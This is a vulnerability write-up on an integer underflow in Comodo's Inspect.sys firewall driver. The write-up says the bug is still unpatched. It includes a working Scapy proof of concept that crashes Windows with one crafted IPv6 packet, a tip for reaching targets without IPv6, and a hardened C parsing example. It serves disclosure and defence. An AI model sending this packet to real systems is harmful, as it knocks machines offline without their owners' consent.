How a Single IPv6 Packet Crashes Comodo’s Firewall Driver (ComoDoS)
Security researcher Marcus Hutchins discovered a zero‑day integer underflow in Comodo Internet Security’s Inspect.sys firewall driver that can be triggered remotely via a crafted IPv6 packet, causing a Windows kernel blue‑screen; the analysis details the vulnerability, PoC, limitations for RCE, and mitigation recommendations.
Event Overview
As of publication the vulnerability remains a zero‑day.
From BYOVD Research to Remote Kernel Exploitation
A system was built to locate local‑privilege‑escalation bugs in third‑party Windows kernel drivers. AI flagged drivers from security vendors as low‑hanging fruit, leading to a focused analysis of Comodo Internet Security’s firewall driver Inspect.sys.
Finding a Useful Bug
Analysis started with a 2014 version of Inspect.sys, which still contained design flaws. The first bug appears in the IPv4 header parser: the driver does not verify that the Internet Header Length (IHL) is smaller than the Total Length. The parser computes the payload size by subtracting the header length from the total length, so setting IHL larger than Total Length triggers an integer underflow and the payload size wraps to roughly 4 billion bytes.
RFC‑compliant routers drop such malformed IPv4 packets, making remote exploitation difficult, though local or LAN attacks remain possible.
IPv6: Larger Attack Surface
IPv6 parsing is more complex and its extension‑header mechanism allows packets to traverse multiple routers without being discarded. The fixed IPv6 header is 40 bytes; the next header field indicates the type of the following header, and a chain of extension headers must be fully traversed, creating fertile ground for parsing bugs.
ComoDoS: One Packet, One Crash
The vulnerability resides in the loop that processes each IPv6 extension header. For each header the code subtracts the header’s length from packet_desc->payload_length without checking for underflow. When the attacker sets payload_length smaller than the total extension‑header length, the unsigned 64‑bit value wraps to its maximum. For example, setting payload_length to 8 and an extension length of 16 yields 0xFFFFFFFFFFFFFFF8 (≈18 exabytes).
Proof‑of‑concept code (Scapy) is extremely compact:

```python
from scapy.all import IPv6, IPv6ExtHdrDestOpt, PadN, TCP, send

dst_ip = "<target IPv6 address>"  # placeholder: not defined in the original snippet

# Destination Options header carrying TCP (nh=6); Scapy pads the PadN option
# to an 8-byte multiple, so the header is 16 bytes on the wire
ext = IPv6ExtHdrDestOpt(nh=6, options=[PadN(optdata=b"\x00"*8)])
tcp = TCP(sport=1337, dport=80, flags="S", seq=0, ack=1, window=0x2000)
# plen=8 declares a payload shorter than the 16-byte extension header,
# which is what makes the driver's subtraction underflow
ipv6 = IPv6(dst=dst_ip, nh=60, hlim=64, plen=8)
pkt = ipv6 / ext / tcp
send(pkt)
```

The packet triggers a crash regardless of firewall rules or open ports; even a configuration that blocks all traffic is bypassed.
Test tip: on systems without IPv6 support, enable “filter IPv6 traffic” in the Comodo firewall and send the crafted packet directly to the target NIC’s MAC address.
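As an added illustration (not code from the original post or from Comodo's driver), the following C walk of the IPv6 extension‑header chain described above checks each header's length against the remaining payload length before subtracting, next to the unchecked subtraction that wraps; the sample packet is constructed inline to match the PoC's shape (plen=8 against a 16‑byte Destination Options header). It assumes only the three headers whose second byte is a Hdr Ext Len field.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Extension headers whose second byte is "Hdr Ext Len" in 8-octet units
   (RFC 8200): Hop-by-Hop (0), Routing (43), Destination Options (60). */
static int is_ext_header(uint8_t nh) {
    return nh == 0 || nh == 43 || nh == 60;
}

/* Unchecked subtraction, the shape of the Inspect.sys loop: with the PoC's
   plen=8 and a 16-byte extension header this wraps to 0xFFFFFFFFFFFFFFF8. */
uint64_t unchecked_remaining(uint64_t payload_len, uint64_t ext_len) {
    return payload_len - ext_len;
}
/* Hardened walk: returns the upper-layer protocol number and the bytes left
   for it, or -1 if the declared lengths do not fit inside each other. */
int walk_ipv6_ext_headers(const uint8_t *pkt, size_t pkt_len, uint64_t *left) {
    if (pkt_len < 40 || (pkt[0] >> 4) != 6) return -1;
    uint64_t payload_len = ((uint64_t)pkt[4] << 8) | pkt[5];
    if (payload_len > pkt_len - 40) return -1;      /* plen beyond the buffer */
    uint8_t nh = pkt[6];
    size_t off = 40;
    while (is_ext_header(nh)) {
        if (payload_len < 8) return -1;             /* no room for a header */
        uint64_t ext_len = ((uint64_t)pkt[off + 1] + 1) * 8;
        if (ext_len > payload_len) return -1;       /* the missing check */
        payload_len -= ext_len;                     /* now cannot underflow */
        nh = pkt[off];
        off += ext_len;
    }
    *left = payload_len;
    return nh;
}

/* Constructed sample shaped like the PoC: 40-byte IPv6 header, 16-byte
   Destination Options header (next header TCP), 20-byte TCP header. */
size_t build_sample(uint8_t buf[76], uint16_t plen) {
    memset(buf, 0, 76);
    buf[0] = 0x60;                        /* version 6, addresses left zero */
    buf[4] = plen >> 8; buf[5] = plen & 0xff;
    buf[6] = 60;                          /* next header: Destination Options */
    buf[7] = 64;                          /* hop limit */
    buf[40] = 6;                          /* ext: next header = TCP */
    buf[41] = 1;                          /* Hdr Ext Len 1 -> (1+1)*8 = 16 */
    buf[42] = 1; buf[43] = 8;             /* PadN, 8 bytes of option data */
    buf[52] = 1; buf[53] = 2;             /* PadN, 2 bytes, fills to 16 */
    return 76;
}
```

With plen=8 the hardened walk rejects the packet at the Destination Options header; with the correct plen=36 it returns protocol 6 (TCP) with 20 bytes left.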
An Avoidable Failure
The driver also contains a reachable control path that permits an out‑of‑bounds write via memcpy. In the WebDAV scanner the payload length field is truncated to 16 bits (64 KB). Reading 65 KB can touch unmapped memory and crash the system. The scanner stops after encountering \r or \n, so a minimal HTTP GET header can terminate the scan early.
In this path the size argument to memcpy is derived from the underflowed length field and is 32 bits, resulting in a memcpy of roughly 4 GB, which inevitably crashes the system.
Triggering this primitive requires a full TCP handshake and at least one open TCP port on the target. Even if the underflow size were limited below 4 GB, heap grooming, ASLR and other mitigations make reliable remote code execution unlikely.
Conclusion
The ComoDoS vulnerability demonstrates an IPv6 integer underflow in a firewall driver that allows a single packet to crash a Windows system. While the bug is unlikely to be weaponised into remote code execution, it highlights the prevalence of driver‑level flaws in security products and the need for strict validation of extension‑header parsing and payload‑length limits.
Full PoC code: https://github.com/MalwareTech/ComoDoS